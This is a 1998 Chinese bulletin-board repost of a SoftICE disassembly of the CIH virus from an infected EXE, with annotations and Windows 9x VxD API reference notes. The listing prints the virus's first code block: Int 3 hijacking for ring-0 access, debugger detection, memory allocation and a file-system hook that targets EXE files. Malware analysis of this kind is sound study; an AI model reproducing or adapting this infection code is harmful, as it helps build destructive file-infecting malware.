softice分析cih的结果.txt

该文件夹里面重点描述了CIH病毒的源码和原理

发信人: TBsoft (TBsoft), 信区: Virus 
标  题: SoftIce分析的结果[转载] 
发信站: 武汉白云黄鹤站 (Mon Oct 26 10:51:47 1998) , 站内信件 
  
发信人: Nova_Zhao@bbs.ustc.edu.cn (真生命), 信区: virus 
标 题: SoftIce分析的结果 
发信站: 中国科大BBS站 (Sun Oct 25 10:37:13 1998) 
转信站: wuheebbs!ustcnews!ustcbbs 
  
CIH 的分析 
被感染的EXE :Sthcd.exe 
文件长度 :209KB 
  
  
入口: 
CS:EIP=0137:004002A1 SS:ESP=013F:0069FE38 
EAX=004002A0 EBX=00000000 ECX=8159970C EDX=8159974C 
ESI=815996EC EDI=81599A08 EBP=0069FF78 EFL=00000A86 
DS=013F ES=013F FS=37E7 GS=0000 
  
  
  
0137:004002A0 PUSH EBP 
0137:004002A1 LEA EAX,[ESP-08] SS:0069FE30=BFF742F3 
0137:004002A5 XOR EBX,EBX 
0137:004002A7 XCHG EAX,FS:[EBX] ;FS是谁的段?? 
0137:004002AA CALL 004002AF 
0137:004002AF POP EBX ;EBX等于上一句的返回地址 
0137:004002B0 LEA ECX,[EBX+42] 
0137:004002B3 PUSH ECX 
0137:004002B4 PUSH EAX 
0137:004002B5 PUSH EAX 　 ;这４字节作为缓冲区 
0137:004002B6 SIDT FWORD PTR [ESP-02] ;取中断描述符表寄存器(48字节）　　　　　　 
  
0137:004002BB POP EBX　　　　　　　　　　　;得到中断描述符表基址　　 
0137:004002BC ADD EBX,1C　　　　　　 ;每个描述项占８字节　　　　 
0137:004002BF CLI　　　　　　　　　　　　　　 ;加1C则指向Int 3的描述项 
0137:004002C0 MOV EBP,[EBX]　　　　　　　　　 
0137:004002C2 MOV BP,[EBX-04] ;保存Int 3的处理入口于EBP中 
0137:004002C6 LEA ESI,[ECX+12]　　　　　　 ;取新的Int 3的处理入口于ESI中　 
0137:004002C9 PUSH ESI 
0137:004002CA MOV [EBX-04],SI 
0137:004002CE SHR ESI,10 
0137:004002D1 MOV [EBX+02],SI 
0137:004002D5 POP ESI ;设置新的Int 3的处理入口，本例中ESI=0x00400303 
0137:004002D6 INT 3 
0137:004002D7 PUSH ESI ;保存ESI 
0137:004002D8 MOV ESI,EAX 
0137:004002DA MOV ECX,[EAX-04] 
0137:004002DD REPZ MOVSB ;传送一块病毒体到申请的线性内存 
0137:004002DF SUB EAX,08 
0137:004002E2 MOV ESI,[EAX] ;传送完了么? 
0137:004002E4 OR ESI,ESI 
0137:004002E6 JZ 004002EA ;完则跳转 
0137:004002E8 JMP 004002DA ;否则循环 
;本例中病毒体分为四块,大小分为0x160,0xc8 
0xc9,0xfa,合计1003字节 
  
0137:004002EA POP ESI ;恢复ESI 
0137:004002EB INT 3 ;安装文件监视的服务,Important!!!! 
;置回Int 3的处理入口 
  
0137:004002EC STI 
0137:004002ED XOR EBX,EBX 
0137:004002EF JMP 004002F8 
0137:004002F1 XOR EBX,EBX 
0137:004002F3 MOV EAX,FS:[EBX] 
0137:004002F6 MOV ESP,[EAX] 
0137:004002F8 POP DWORD PTR FS:[EBX] 
0137:004002FB POP EAX 
0137:004002FC POP EBP 
0137:004002FD PUSH 0040A010 ;恢复原程序的运行 
0137:00400302 RET 
  
  
;新的Int 3的处理入口 
0137:00400303 JZ 00400337 
0137:00400305 MOV ECX,DR0 ;DR0调试断点一,检测调试程序 
0137:00400308 JECXZ 0040031A ;无则跳转 
0137:0040030A ADD DWORD PTR [ESP],15 
0137:0040030E MOV [EBX-04],BP ;置回Int 3的处理入口 
0137:00400312 SHR EBP,10 
0137:00400315 MOV [EBX+02],BP 　　　　 
0137:00400319 IRETD 
  
0137:0040031A MOV DR0,EBX ;破坏追踪 
0137:0040031D PUSH 0F 
0137:0040031F PUSH ECX ;ECX必须为零，For PG_VM 
0137:00400320 PUSH FF ;VM Handle 
0137:00400322 PUSH ECX ;Physical address is a multiple of 4K. 
0137:00400323 PUSH ECX ; 
0137:00400324 PUSH ECX 
0137:00400325 PUSH 01 
0137:00400327 PUSH 02 ;PAGEUSEALIGN 
0137:00400329 INT 20 VXDCall _PageAllocate ;申请一块线性内存 
0137:0040032F ADD ESP,20 
0137:00400332 XCHG EAX,EDI ;基址置于EDI中 
0137:00400333 LEA EAX,[ESI-63] ;取第一块病毒体的地址 
0137:00400336 IRETD 
  
  
  
0137:00400337 LEA EAX,[EDI-0309] 
0137:0040033D PUSH EAX 
0137:0040033E INT 20 VXDCall IFSMgr_InstallFileSystemApiHook 
;安装文件监视的服务,Important!!!! 
0137:00400344 MOV DR0,EAX 
0137:00400347 POP EAX 
0137:00400348 MOV ECX,[ESI+3D] 
0137:0040034B MOV EDX,[ECX] 
0137:0040034D MOV [EAX-04],EDX 
0137:00400350 LEA EAX,[EAX-2A] 
0137:00400353 MOV [ECX],EAX 
0137:00400355 CLI 
0137:00400356 JMP 0040030E 
0137:00400358 PUSH EBX 
0137:00400359 CALL 0040035E 
0137:0040035E POP EBX 
0137:0040035F ADD EBX,24 
0137:00400362 PUSH EBX 
0137:00400363 INT 20 VXDCall IFSMgr_RemoveFileSystemApiHook 
0137:00400369 POP EAX 
0137:0040036A PUSH DWORD PTR [ESP+08] 
0137:0040036E CALL [EBX-04] 
0137:00400371 POP ECX 
0137:00400372 PUSH EAX 
0137:00400373 PUSH EBX 
0137:00400374 CALL [EBX-04] 
0137:00400377 POP ECX 
0137:00400378 MOV DR0,EAX 
0137:0040037B POP EAX 
0137:0040037C POP EBX 
0137:0040037D RET 
0137:0040037E CMP AL,0E 
0137:00400381 SHL BYTE PTR [EAX-18],00 
0137:00400385 ADD [EAX],AL 
0137:00400387 ADD [ESI-7F],BL 
0137:0040038A MOV BYTE PTR [EBX],03 
0137:0040038D ADD [EAX],AL 
0137:0040038F TEST BYTE PTR [ESI],01 
0137:00400392 JNZ 00400588 
0137:00400398 LEA EBX,[ESP+28] 
0137:0040039C CMP DWORD PTR [EBX],24 
0137:0040039F JNZ 00400582 
0137:004003A5 INC BYTE PTR [ESI] 
0137:004003A7 ADD ESI,05 
0137:004003AA PUSH ESI 
0137:004003AB MOV AL,[EBX+04] 
0137:004003AE CMP AL,FF 
0137:004003B0 JZ 004003BA 
0137:004003B2 ADD AL,40 
0137:004003B4 MOV AH,3A 
0137:004003B6 MOV [ESI],EAX 
0137:004003B8 INC ESI 
0137:004003B9 INC ESI 
0137:004003BA PUSH 00 
0137:004003BC PUSH 7F 
0137:004003BE MOV EBX,[EBX+10] 
0137:004003C1 MOV EAX,[EBX+0C] 
0137:004003C4 ADD EAX,04 
0137:004003C7 PUSH EAX 
0137:004003C8 PUSH ESI 
0137:004003C9 INT 20 VXDCall UniToBCSPath 
0137:004003CF ADD ESP,10 
0137:004003D2 CMP DWORD PTR [EAX+ESI-04],4558452E 
0137:004003DA POP ESI 
0137:004003DB JNZ 0040057F 
0137:004003E1 CMP WORD PTR [EBX+18],01 
0137:004003E6 JNZ 0040057F 
0137:004003EC MOV AX,4300 
0137:004003F0 INT 20 VXDCall IFSMgr_Ring0_FileIO 
0137:004003F6 JB 0040057F 
0137:004003FC PUSH ECX 
0137:004003FD MOV EDI,[ESI+00000062] 
0137:00400403 ADD [EAX],AL 
0137:00400405 ADD [EAX],AL 
0137:00400407 ADD [EAX],AL 
0137:00400409 ADD [EAX],AL 
0137:0040040B ADD [EAX],AL 
0137:0040040D ADD [EAX],AL 
0137:0040040F ADD [EAX],AL 
0137:00400411 ADD [EAX],AL 
0137:00400413 ADD [EAX],AL 
0137:00400415 ADD [EAX],AL 
0137:00400417 ADD [EAX],AL 
0137:00400419 ADD [EAX],AL 
0137:0040041B ADD [EAX],AL 
0137:0040041D ADD [EAX],AL 
0137:0040041F ADD [EAX],AL 
0137:00400421 ADD [EAX],AL 
0137:00400423 ADD [EAX],AL 
0137:00400425 ADD [EAX],AL 
0137:00400427 ADD [EAX],AL 
0137:00400429 ADD [EAX],AL 
0137:0040042B ADD [EAX],AL 
0137:0040042D ADD [EAX],AL 
0137:0040042F ADD [EAX],AL 
0137:00400431 ADD [EAX],AL 
0137:00400433 ADD [EAX],AL 
0137:00400435 ADD [EAX],AL 
0137:00400437 ADD [EAX],AL 
0137:00400439 ADD [EAX],AL 
0137:0040043B ADD [EAX],AL 
0137:0040043D ADD [EAX],AL 
  
//以上是病毒体的第一部分 
  
  
  
注释: 
VXD服务 
1.　_PageAllocate 
C语言原型：ULONG EXTERN _PageAllocate(ULONG nPages, ULONG pType, ULONG VM, 
　　 ULONG AlignMask, ULONG minPhys, ULONG maxPhys, ULONG *PhysAddr, 
　 ULONG flags); 
  
0137:0040031D PUSH 0F 
0137:0040031F PUSH ECX 
0137:00400320 PUSH FF 
0137:00400322 PUSH ECX 
0137:00400323 PUSH ECX 
0137:00400324 PUSH ECX 
0137:00400325 PUSH 01 
0137:00400327 PUSH 02 
  
  
#define PG_VM 0 
#define PG_SYS 1 
#define PG_RESERVED1 2 
#define PG_PRIVATE 3 
#define PG_RESERVED2 4 
#define PG_RELOCK 5 /* PRIVATE to MMGR */ 
#define PG_INSTANCE 6 
#define PG_HOOKED 7 
#define PG_IGNORE 0xFFFFFFFF 
  
#define PAGEZEROINIT 0x00000001 
#define PAGEUSEALIGN 0x00000002 
#define PAGECONTIG 0x00000004 
#define PAGEFIXED 0x00000008 
#define PAGEDEBUGNULFAULT 0x00000010 
#define PAGEZEROREINIT 0x00000020 
#define PAGENOCOPY 0x00000040 
#define PAGELOCKED 0x00000080 
#define PAGELOCKEDIFDP 0x00000100 
#define PAGESETV86PAGEABLE 0x00000200 
#define PAGECLEARV86PAGEABLE 0x00000400 
#define PAGESETV86INTSLOCKED 0x00000800 
#define PAGECLEARV86INTSLOCKED 0x00001000 
#define PAGEMARKPAGEOUT 0x00002000 
#define PAGEPDPSETBASE 0x00004000 
#define PAGEPDPCLEARBASE 0x00008000 
#define PAGEDISCARD 0x00010000 
#define PAGEPDPQUERYDIRTY 0x00020000 
#define PAGEMAPFREEPHYSREG 0x00040000 
#define PAGENOMOVE 0x10000000 
#define PAGEMAPGLOBAL 0x40000000 
#define PAGEMARKDIRTY 0x80000000 
  
  
2.IFSMgr_InstallFileSystemApiHook 
IFSMgr_InstallFileSystemApiHook( 
pIFSFileHookFunc HookFunc 
) 
3.IFSMgr_RemoveFileSystemApiHook 
IFSMgr_RemoveFileSystemApiHook( 
pIFSFileHookFunc HookFunc 
) 
4.UniToBCSPath 
UniToBCSPath( 
unsigned char * pBCSPath, 
ParsedPath * pUniPath, 
unsigned int maxLength, 
int charSet 
) 
This service converts a canonicalized unicode pathname to a normal pathname in t 
he 
specified BCS character set i.e. the path element lengths are converted into pro 
per 
path separators in addition to the character set conversion. Currently, the Wind 
ows 
ANSI codepage or the current OEM codepage in the system can be specified for the 
  
conversion. It is important to note that the source and destination buffers cann 
ot 
be the same nor can they overlap. They should be two separate buffers. This serv 
ice 
does not terminate the converted path with a NUL character, the caller of the se 
rvice 
needs to do this, if necessary. 
  
5.IFSMgr_Ring0_FileIO 
This service provides a register-based VxD callable interface to the common file 
system 
functions. Other VxDs in the system can use this service to make filesystem call 
s without 
having to issue int 21h calls. An FSD itself can call this interface to do files 
ystem 
operations in certain situations. The different functions provided as part of th 
is 
service are described below. Since these calls can be made only by 'trusted' sys 
tem 
components, the IFS manager does not do any parameter validation on them. Users 
of this 
service should be very careful to check that they are passing in valid parameter 
s. 
  
OpenCreateFile 
This interface is the same as the interface for the int 21h extended open functi 
on 
(06Ch ). If the R0_OPENCREATFILE function code is used, the operation is done in 
 an 
independent context, so that handle is globally accessible from any VM. If the 
R0_OPENCREAT_IN_CONTEXT function code is used, the operation is done in the cont 
ext 
of the current thread and process. 
[EAX] 
R0_OPENCREATFILE or RO_OPENCREAT_IN_CONTEXT 
  
[BX] 
  
Open mode and other flags. The flags are exactly the same as those on the int 21 
h 
function 6Ch. Please refer to the specification of the int 21h function for deta 
ils. 
  
[CX] 
  
Attributes to use on a create operation. 
  
[DL] 
  
Action to be performed. Look at the int 21h, function 6ch documentation for deta 
ils. 
  
[DH] 
  
Special flags that are available only on this api. This register is reserved and 
 not used on the int 21h, function 6Ch api. 
  
Special Ring 0 Api Open Flags: 
Value Meaning 
R0_NO_CACHE Indicates that reads and writes on the file should not be cached. 
All operations will be directly done to the disk. 
R0_SWAPPER_CALL Indicates that the i/o operation is being performed to the syste 
m 
swap file. This is a privileged call that should be set only by the 
memory manager when it is doing i/o to page stuff in and out of the disk. 
The filesystem that handles swap file io needs to ensure certain 
conditions to prevent deadlocks. These are described in section 8.3.4 
of this document. 
  
[ESI] 
  
Flat pointer to the pathname of the file to be opened/created. 
  
?Carry flag clear, operation was successful. 
  
[EAX] Handle to opened file. 
[ECX] Actual action performed. For the return values, please refer to the docume 
nt describing the int 21h, function 6Ch api. 
  
Carry flag set, an error occurred. [AX] contains the errorcode. 
Registers Used EAX, ECX, Flags. 
  
ReadFile 
This function is called to read a file previously opened by OpenCreateFile. The 
handle must be one returned from the OpenCreateFile service described above, it 
cannot be a handle opened by issuing an int 21h. If the R0_READFILE_IN_CONTEXT f 
unction code i 
  
  
[EAX] 
  
R0_READFILE or R0_READFILE_IN_CONTEXT. 
  
[EBX] 
  
File handle. 
  
[ECX] 
  
Count of bytes to be read. This can be a full 32-bit transfer count. 
  
[EDX] 
  
Position in file the read operation needs to start at. 
  
[ESI] 
  
Flat pointer to the buffer the data is to read into. 
  
?Carry flag clear, no error. 
  
[ECX] Number of bytes actually read. 
  
Carry flag set, an error occurred. [AX] contains the errorcode.